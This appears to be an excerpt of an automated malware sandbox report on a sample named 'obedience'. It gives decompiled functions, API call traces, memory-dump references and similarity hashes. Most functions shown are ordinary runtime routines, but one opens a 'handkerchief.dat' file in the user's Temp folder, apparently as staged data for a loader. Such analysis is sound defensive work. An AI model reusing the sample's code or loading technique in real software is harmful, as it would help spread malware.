      • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004626E0
      • CreateFontIndirectA.GDI32(?), ref: 004626ED
      • GetStockObject.GDI32(0000000D), ref: 00462703
        • Part of subcall function 00425DCC: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425DD9
      • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0046272C
      • CreateFontIndirectA.GDI32(?), ref: 0046273C
      • CreateFontIndirectA.GDI32(?), ref: 00462755
      • GetStockObject.GDI32(0000000D), ref: 0046277B
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
      • String ID:
      • API String ID: 2891467149-0
      • Opcode ID: 0f1e32749af3e71fc4595732bb9e634a40be76ee7e03f66890bdd669dc6af00b
      • Instruction ID: def7c6e9a9eb7418f64a5ff5c4d42f488a08ba6007ab330fd4d9eb85c3c9d376
      • Opcode Fuzzy Hash: 0f1e32749af3e71fc4595732bb9e634a40be76ee7e03f66890bdd669dc6af00b
      • Instruction Fuzzy Hash: AD318A30704705AFD750FBB5DC41F9A37A4AB44309F54807BB908DB2D6FA78A845C76A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00401C1C Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 594 401c1c-401c3f RtlInitializeCriticalSection 595 401c41-401c46 RtlEnterCriticalSection 594->595 596 401c4b-401c81 call 401498 * 3 LocalAlloc 594->596 595->596 603 401cc3-401cd7 596->603 604 401c83 596->604 608 401ce3 603->608 609 401cd9-401cde RtlLeaveCriticalSection 603->609 605 401c88-401c9a 604->605 605->605 607 401c9c-401cbc 605->607 607->603 609->608
      C-Code - Quality: 69%
      			E00401C1C() {
				intOrPtr* _v8;
				void* _t17;
				signed int _t19;
				intOrPtr _t28;
				void* _t29;
				intOrPtr _t34;

				_push(_t34);
				_push(E00401CE4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t34;
				_push(0x4905c8);
				L004013F4();
				if( *0x490049 != 0) {
					_push(0x4905c8);
					L004013FC();
				}
				E00401498(0x4905e8);
				E00401498(0x4905f8);
				E00401498(0x490624);
				_t17 = LocalAlloc(0, 0xff8); // executed
				 *0x490620 = _t17;
				if( *0x490620 != 0) {
					_t19 = 3;
					do {
						_t29 =  *0x490620; // 0x808628
						 *((intOrPtr*)(_t29 + _t19 * 4 - 0xc)) = 0;
						_t19 = _t19 + 1;
					} while (_t19 != 0x401);
					_v8 = 0x490608;
					 *((intOrPtr*)(_v8 + 4)) = _v8;
					 *_v8 = _v8;
					 *0x490614 = _v8;
					 *0x4905c0 = 1;
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E00401CEB);
				if( *0x490049 != 0) {
					_push(0x4905c8);
					L00401404();
					return 0;
				}
				return 0;
			}









      0x00401c22
      0x00401c23
      0x00401c28
      0x00401c2b
      0x00401c2e
      0x00401c33
      0x00401c3f
      0x00401c41
      0x00401c46
      0x00401c46
      0x00401c50
      0x00401c5a
      0x00401c64
      0x00401c70
      0x00401c75
      0x00401c81
      0x00401c83
      0x00401c88
      0x00401c88
      0x00401c90
      0x00401c94
      0x00401c95
      0x00401c9c
      0x00401ca9
      0x00401cb2
      0x00401cb7
      0x00401cbc
      0x00401cbc
      0x00401cc5
      0x00401cc8
      0x00401ccb
      0x00401cd7
      0x00401cd9
      0x00401cde
      0x00000000
      0x00401cde
      0x00401ce3

      APIs
      • RtlInitializeCriticalSection.KERNEL32(004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C33
      • RtlEnterCriticalSection.KERNEL32(004905C8,004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C46
      • LocalAlloc.KERNEL32(00000000,00000FF8,004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C70
      • RtlLeaveCriticalSection.KERNEL32(004905C8,00401CEB,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401CDE
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
      • String ID:
      • API String ID: 730355536-0
      • Opcode ID: d050b6857653eea67ce8a629f36398fb7337f322f86e8f88e53513697ead930d
      • Instruction ID: b08383492a40db6a362fa1f166d647523cd183d4f6bca2ca8448ce6046a23857
      • Opcode Fuzzy Hash: d050b6857653eea67ce8a629f36398fb7337f322f86e8f88e53513697ead930d
      • Instruction Fuzzy Hash: F2115870688644AFEB15EB9ED905B697BE1EB9A304F51807BE400A76F2C77C8D108B1D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED96310 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 89%
      			E6ED96310(void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v0;
				char* _v12;
				char _v24;
				void* _t10;
				signed int _t11;
				void* _t23;
				void* _t24;
				void* _t26;

				L0:
				while(1) {
					L0:
					_t26 = __esi;
					_t24 = __edi;
					_t23 = __edx;
					_pop(_t28);
					while(1) {
						L3:
						_t10 = E6ED989A7(_t23, _t24, _t26, _v0); // executed
						if(_t10 != 0) {
							break;
						}
						L2:
						_t11 = L6ED99002(_t10, _v0);
						__eflags = _t11;
						if(_t11 == 0) {
							L5:
							__eflags =  *0x6edb04ec & 0x00000001;
							if(( *0x6edb04ec & 0x00000001) == 0) {
								 *0x6edb04ec =  *0x6edb04ec | 0x00000001;
								__eflags =  *0x6edb04ec;
								_push(1);
								_v12 = "bad allocation";
								L6ED95D00(0x6edb04e0,  &_v12);
								 *0x6edb04e0 = 0x6eda6240;
								E6ED96785( *0x6edb04ec, 0x6eda5911);
							}
							L7:
							L6ED95E0D( &_v24, 0x6edb04e0);
							_v24 = 0x6eda6240;
							L6ED9902A( &_v24, 0x6edaa78c);
							asm("int3");
							goto L0;
						}
					}
					L4:
					return _t10;
					L8:
				}
			}











      0x6ed96310
      0x6ed96310
      0x6ed96310
      0x6ed96310
      0x6ed96310
      0x6ed96310
      0x6ed96315
      0x6ed962a7
      0x6ed962a7
      0x6ed962aa
      0x6ed962b2
      0x00000000
      0x00000000
      0x6ed9629a
      0x6ed9629d
      0x6ed962a3
      0x6ed962a5
      0x6ed962b6
      0x6ed962b6
      0x6ed962c7
      0x6ed962c9
      0x6ed962c9
      0x6ed962d0
      0x6ed962d8
      0x6ed962df
      0x6ed962e9
      0x6ed962ef
      0x6ed962f4
      0x6ed962f5
      0x6ed962f9
      0x6ed96307
      0x6ed9630a
      0x6ed9630f
      0x00000000
      0x6ed9630f
      0x6ed962a5
      0x6ed962b5
      0x6ed962b5
      0x00000000
      0x6ed962b5

      APIs
      • _malloc.LIBCMT ref: 6ED962AA
        • Part of subcall function 6ED989A7: __FF_MSGBANNER.LIBCMT ref: 6ED989C0
        • Part of subcall function 6ED989A7: __NMSG_WRITE.LIBCMT ref: 6ED989C7
        • Part of subcall function 6ED989A7: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,6ED962AF,?,6ED91A9A,00000004,?), ref: 6ED989EC
      • std::exception::exception.LIBCMT ref: 6ED962DF
      • std::exception::exception.LIBCMT ref: 6ED962F9
      • __CxxThrowException@8.LIBCMT ref: 6ED9630A
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
      • String ID:
      • API String ID: 615853336-0
      • Opcode ID: 4f64d10d9cab9b23cdaa42f985f9338ed83d5b1e9722bd7f5043f8a7f3100c47
      • Instruction ID: 77e5d8407adff6357a2d62a5dc3e7e821e669f90f9ab150c06a2354569796828
      • Opcode Fuzzy Hash: 4f64d10d9cab9b23cdaa42f985f9338ed83d5b1e9722bd7f5043f8a7f3100c47
      • Instruction Fuzzy Hash: 7901DB71410109EEDB14DBEDCE05AEE376DAF82398F500455E5305A180FB70DA45A7E1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042D620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
      Download Yara Rule
      C-Code - Quality: 58%
      			E0042D620(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;

				_t8 = _a4;
				if( *0x49092c == 0) {
					 *0x490904 = E0042D52C(0, _t8, "GetSystemMetrics",  *0x490904, _t17);
					_t7 =  *0x490904(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}












      0x0042d624
      0x0042d62e
      0x0042d642
      0x0042d648
      0x00000000
      0x0042d648
      0x0042d650
      0x0042d658
      0x0042d658
      0x0042d65b
      0x0042d66f
      0x0042d65d
      0x0042d65d
      0x0042d673
      0x0042d65f
      0x0042d65f
      0x0042d65f
      0x0042d660
      0x0042d677
      0x0042d662
      0x0042d663
      0x0042d666
      0x0042d668
      0x0042d668
      0x0042d666
      0x0042d660
      0x0042d65d
      0x0042d67c
      0x0042d67f
      0x0042d689
      0x0042d681
      0x00000000
      0x0042d682

      APIs
      • GetSystemMetrics.USER32 ref: 0042D682
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      • KiUserCallbackDispatcher.NTDLL ref: 0042D648
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressCallbackDispatcherMetricsProcSystemUser
      • String ID: GetSystemMetrics
      • API String ID: 54681038-96882338
      • Opcode ID: 2c8415d257762d1cb3895e5a95a1370ea859569dfe3ca5fa96d90518bad69465
      • Instruction ID: 91c61874e25910ba508526ca6d1b4ba87804e0891a7441964256ef56ad3ea793
      • Opcode Fuzzy Hash: 2c8415d257762d1cb3895e5a95a1370ea859569dfe3ca5fa96d90518bad69465
      • Instruction Fuzzy Hash: 3FF090F0F142285EF7104A38BD847333556D7A9330FE18B33E129862E6C67DAC45825D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6EDA2910 Relevance: 4.6, APIs: 3, Instructions: 74COMMON
      Download Yara Rule
      C-Code - Quality: 86%
      			E6EDA2910(void* __edi, signed int _a8) {
				intOrPtr _v0;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t17;
				signed int _t18;
				signed int _t19;
				signed int _t22;
				signed int _t25;
				signed int _t27;
				signed char _t28;
				signed int _t31;
				void* _t32;
				signed int _t34;
				void* _t38;

				_t32 = __edi;
				_pop(_t36);
				_t27 = _a8;
				_t25 = _t27 & 0x00000004;
				_t31 = _t27 & 0x00000080;
				_t17 = 1;
				if((_t27 & 0x00000040) != 0) {
					_t27 = _t27 | 1;
				}
				if((_t27 & 0x00000008) != 0) {
					_t27 = _t27 | 0x00000002;
				}
				_t28 = _t27 & 0xffffff3b;
				_t34 = 0;
				while(_t17 != _t28) {
					_t17 =  *((intOrPtr*)(0x6eda8ae0 + _t34 * 4));
					_t34 = _t34 + 1;
					if(_t17 != 0) {
						continue;
					}
					break;
				}
				if( *((intOrPtr*)(0x6eda8adc + _t34 * 4)) != 0) {
					__eflags = _t31;
					if(_t31 == 0) {
						L15:
						_t18 = E6EDA2849(_v0, _t34, _a8); // executed
						_t34 = _t18;
						__eflags = _t34;
						if(_t34 == 0) {
							goto L9;
						} else {
							__eflags = _t25;
							if(__eflags == 0) {
								L19:
								_t19 = _t34;
							} else {
								_push(2);
								_push(0);
								_push(_t34);
								__eflags = L6EDA31D3(_t25, _t31, _t32, _t34, __eflags);
								if(__eflags == 0) {
									goto L19;
								} else {
									_push(_t34);
									goto L14;
								}
							}
						}
					} else {
						__eflags = _t28 & 0x0000000a;
						if((_t28 & 0x0000000a) == 0) {
							goto L15;
						} else {
							_t22 = E6EDA2849(_v0, 0, _a8);
							_t38 = _t38 + 0xc;
							__eflags = _t22;
							if(__eflags == 0) {
								goto L15;
							} else {
								_push(_t22);
								L14:
								E6ED972F8(_t25, _t31, _t32, _t34, __eflags);
								goto L9;
							}
						}
					}
				} else {
					L9:
					_t19 = 0;
				}
				return _t19;
			}


















      0x6eda2910
      0x6eda2915
      0x6eda286d
      0x6eda2877
      0x6eda287a
      0x6eda2880
      0x6eda2885
      0x6eda2887
      0x6eda2887
      0x6eda288c
      0x6eda288e
      0x6eda288e
      0x6eda2891
      0x6eda2897
      0x6eda2899
      0x6eda289d
      0x6eda28a4
      0x6eda28a7
      0x00000000
      0x00000000
      0x00000000
      0x6eda28a7
      0x6eda28b1
      0x6eda28b7
      0x6eda28b9
      0x6eda28dd
      0x6eda28e4
      0x6eda28e9
      0x6eda28ee
      0x6eda28f0
      0x00000000
      0x6eda28f2
      0x6eda28f2
      0x6eda28f4
      0x6eda290a
      0x6eda290a
      0x6eda28f6
      0x6eda28f6
      0x6eda28f8
      0x6eda28fa
      0x6eda2903
      0x6eda2905
      0x00000000
      0x6eda2907
      0x6eda2907
      0x00000000
      0x6eda2907
      0x6eda2905
      0x6eda28f4
      0x6eda28bb
      0x6eda28bb
      0x6eda28be
      0x00000000
      0x6eda28c0
      0x6eda28c8
      0x6eda28cd
      0x6eda28d0
      0x6eda28d2
      0x00000000
      0x6eda28d4
      0x6eda28d4
      0x6eda28d5
      0x6eda28d5
      0x00000000
      0x6eda28da
      0x6eda28d2
      0x6eda28be
      0x6eda28b3
      0x6eda28b3
      0x6eda28b3
      0x6eda28b3
      0x6eda290f

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: Xfsopenstd::_$_fseek
      • String ID:
      • API String ID: 1675860589-0
      • Opcode ID: efcfb3316fe657b493060ee15c47ca5db5c7d33bb2098f5b46f57346027c1b9f
      • Instruction ID: bf5f5079fbb94330dadbec6d5391e507747dc4ef553993bdab4aed219a237399
      • Opcode Fuzzy Hash: efcfb3316fe657b493060ee15c47ca5db5c7d33bb2098f5b46f57346027c1b9f
      • Instruction Fuzzy Hash: FE112333A4461AEBFB500BFFDD21BAB3688AB01798F040434FF559B594EA20C7128290
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED94DE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85COMMON
      Download Yara Rule
      C-Code - Quality: 53%
      			E6ED94DE0(void* __edx, signed int _a4) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t16;
				void* _t21;
				void* _t25;
				signed int _t30;
				signed int _t37;
				void* _t39;
				void* _t48;
				void* _t50;
				signed int _t59;
				void* _t61;
				signed int _t64;

				_t48 = __edx;
				_push(0xffffffff);
				_push(0x6eda5738);
				_push( *[fs:0x0]);
				_push(_t39);
				_push(_t50);
				_t16 =  *0x6edaf2a0; // 0x267b4ecc
				_push(_t16 ^ _t64);
				 *[fs:0x0] =  &_v16;
				_t61 = _t39;
				if( *((intOrPtr*)(_t61 + 0x54)) != 0) {
					L9:
					 *[fs:0x0] = _v16;
					return 0;
				} else {
					_push(0x40);
					_push(_a4);
					_t21 = E6EDA2910(_t50, "C:\Users\jones\AppData\Local\Temp\handkerchief.dat"); // executed
					if(_t21 == 0) {
						goto L9;
					} else {
						E6ED94F60(_t61, _t21, _t48, 1);
						_t25 = L6ED95550(_t61, _t21,  &_a4);
						_v8 = 0;
						L6ED951C0(L6ED95940(_t25), _t61);
						_v8 = 0xffffffff;
						_t37 = _a4;
						if(_t37 != 0) {
							L6EDA1ECB( &_v20, 0);
							_t30 =  *(_t37 + 4);
							if(_t30 != 0 && _t30 < 0xffffffff) {
								 *(_t37 + 4) = _t30 - 1;
							}
							asm("sbb edi, edi");
							L6EDA1EF3( &_v20);
							_t59 =  !( ~( *(_t37 + 4))) & _t37;
							if(_t59 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t59))))(1);
							}
						}
						 *[fs:0x0] = _v16;
						return _t61;
					}
				}
			}




















      0x6ed94de0
      0x6ed94de3
      0x6ed94de5
      0x6ed94df0
      0x6ed94df1
      0x6ed94df4
      0x6ed94df5
      0x6ed94dfc
      0x6ed94e00
      0x6ed94e06
      0x6ed94e0c
      0x6ed94eb4
      0x6ed94eb9
      0x6ed94ec7
      0x6ed94e12
      0x6ed94e15
      0x6ed94e17
      0x6ed94e1d
      0x6ed94e27
      0x00000000
      0x6ed94e2d
      0x6ed94e33
      0x6ed94e3d
      0x6ed94e44
      0x6ed94e52
      0x6ed94e57
      0x6ed94e5e
      0x6ed94e63
      0x6ed94e6a
      0x6ed94e6f
      0x6ed94e74
      0x6ed94e7c
      0x6ed94e7c
      0x6ed94e84
      0x6ed94e8b
      0x6ed94e90
      0x6ed94e92
      0x6ed94e9c
      0x6ed94e9c
      0x6ed94e92
      0x6ed94ea3
      0x6ed94eb1
      0x6ed94eb1
      0x6ed94e27

      APIs
        • Part of subcall function 6ED95550: std::_Lockit::_Lockit.LIBCPMT ref: 6ED95561
        • Part of subcall function 6ED95940: std::_Lockit::_Lockit.LIBCPMT ref: 6ED9596C
        • Part of subcall function 6ED95940: std::_Lockit::_Lockit.LIBCPMT ref: 6ED9598F
      • std::_Lockit::_Lockit.LIBCPMT ref: 6ED94E6A
      Strings
      • C:\Users\user\AppData\Local\Temp\handkerchief.dat, xrefs: 6ED94E18
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_
      • String ID: C:\Users\user\AppData\Local\Temp\handkerchief.dat
      • API String ID: 3382485803-2248458510
      • Opcode ID: 9597a256390b9c7bb59997c705604590210d3b47e3e0b25bae2fb170f54cbe82
      • Instruction ID: 8960e896a09ebb5d90d2365182f15a751cbdf78fdd2c4e62f7f3996c6414ddda
      • Opcode Fuzzy Hash: 9597a256390b9c7bb59997c705604590210d3b47e3e0b25bae2fb170f54cbe82
      • Instruction Fuzzy Hash: F02192727046049FDB10CFA9CC80BADB3E9EB44724F104A69EA25DB3C1DB75EA0597A0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00402478 Relevance: 3.1, APIs: 2, Instructions: 125COMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00401C1C: RtlInitializeCriticalSection.KERNEL32(004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C33
        • Part of subcall function 00401C1C: RtlEnterCriticalSection.KERNEL32(004905C8,004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C46
        • Part of subcall function 00401C1C: LocalAlloc.KERNEL32(00000000,00000FF8,004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C70
        • Part of subcall function 00401C1C: RtlLeaveCriticalSection.KERNEL32(004905C8,00401CEB,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401CDE
      • RtlEnterCriticalSection.KERNEL32(004905C8,00000000,00402614), ref: 004024C1
      • RtlLeaveCriticalSection.KERNEL32(004905C8,0040261B), ref: 0040260E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
      • String ID:
      • API String ID: 2227675388-0
      • Opcode ID: 6654d63cf1de98b99b606b5a026784bb319eaba7b001379ab83f034a0ff26c7e
      • Instruction ID: 437f76a5d116e02953adcd54d966f40abb264215bc7eb1a38964ba590944f2fe
      • Opcode Fuzzy Hash: 6654d63cf1de98b99b606b5a026784bb319eaba7b001379ab83f034a0ff26c7e
      • Instruction Fuzzy Hash: 3C5139B5A002099FDB50CF69DA84A6EB7F0FB98314F24817AD805B7391D378A951CF58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED91A60 Relevance: 3.0, APIs: 2, Instructions: 50COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E6ED91A60(void* __ecx, void* __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t20;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t25;
				intOrPtr* _t27;
				intOrPtr _t30;
				void* _t34;

				_t34 = __esi;
				 *((intOrPtr*)(__esi + 0x30)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				 *((intOrPtr*)(__esi + 0x10)) = 0;
				 *((intOrPtr*)(__esi + 0x14)) = 0x201;
				 *((intOrPtr*)(__esi + 0x18)) = 6;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 0x20)) = 0;
				 *((intOrPtr*)(__esi + 0x24)) = 0;
				 *((intOrPtr*)(__esi + 0x28)) = 0;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				 *((intOrPtr*)(__esi + 0xc)) = 0;
				_t20 = L6ED96290(__edx, 0, __esi, __eflags, 4);
				_t27 = _t20;
				_t38 = _t27;
				if(_t27 == 0) {
					 *((intOrPtr*)(__esi + 0x30)) = 0;
					return _t20;
				} else {
					_t21 = E6EDA21D7(_t27, __edx, 0, __esi, _t38); // executed
					 *_t27 = _t21;
					_v8 = L6EDA1F96();
					L6EDA1ECB( &_v12, 0);
					_t30 = _v8;
					_t24 =  *((intOrPtr*)(_t30 + 4));
					if(_t24 < 0xffffffff) {
						 *((intOrPtr*)(_t30 + 4)) = _t24 + 1;
					}
					_t25 = L6EDA1EF3( &_v12);
					 *((intOrPtr*)(_t34 + 0x30)) = _t27;
					return _t25;
				}
			}















      0x6ed91a60
      0x6ed91a6c
      0x6ed91a6f
      0x6ed91a72
      0x6ed91a75
      0x6ed91a7c
      0x6ed91a83
      0x6ed91a86
      0x6ed91a89
      0x6ed91a8c
      0x6ed91a8f
      0x6ed91a92
      0x6ed91a95
      0x6ed91a9a
      0x6ed91a9f
      0x6ed91aa1
      0x6ed91adb
      0x6ed91ae3
      0x6ed91aa3
      0x6ed91aa3
      0x6ed91aa8
      0x6ed91ab3
      0x6ed91ab6
      0x6ed91abb
      0x6ed91abe
      0x6ed91ac4
      0x6ed91ac7
      0x6ed91ac7
      0x6ed91acd
      0x6ed91ad2
      0x6ed91ada
      0x6ed91ada

      APIs
        • Part of subcall function 6ED96310: _malloc.LIBCMT ref: 6ED962AA
      • std::locale::_Init.LIBCPMT ref: 6ED91AA3
        • Part of subcall function 6EDA21D7: __EH_prolog3.LIBCMT ref: 6EDA21DE
        • Part of subcall function 6EDA21D7: std::_Lockit::_Lockit.LIBCPMT ref: 6EDA21F4
        • Part of subcall function 6EDA21D7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6EDA2216
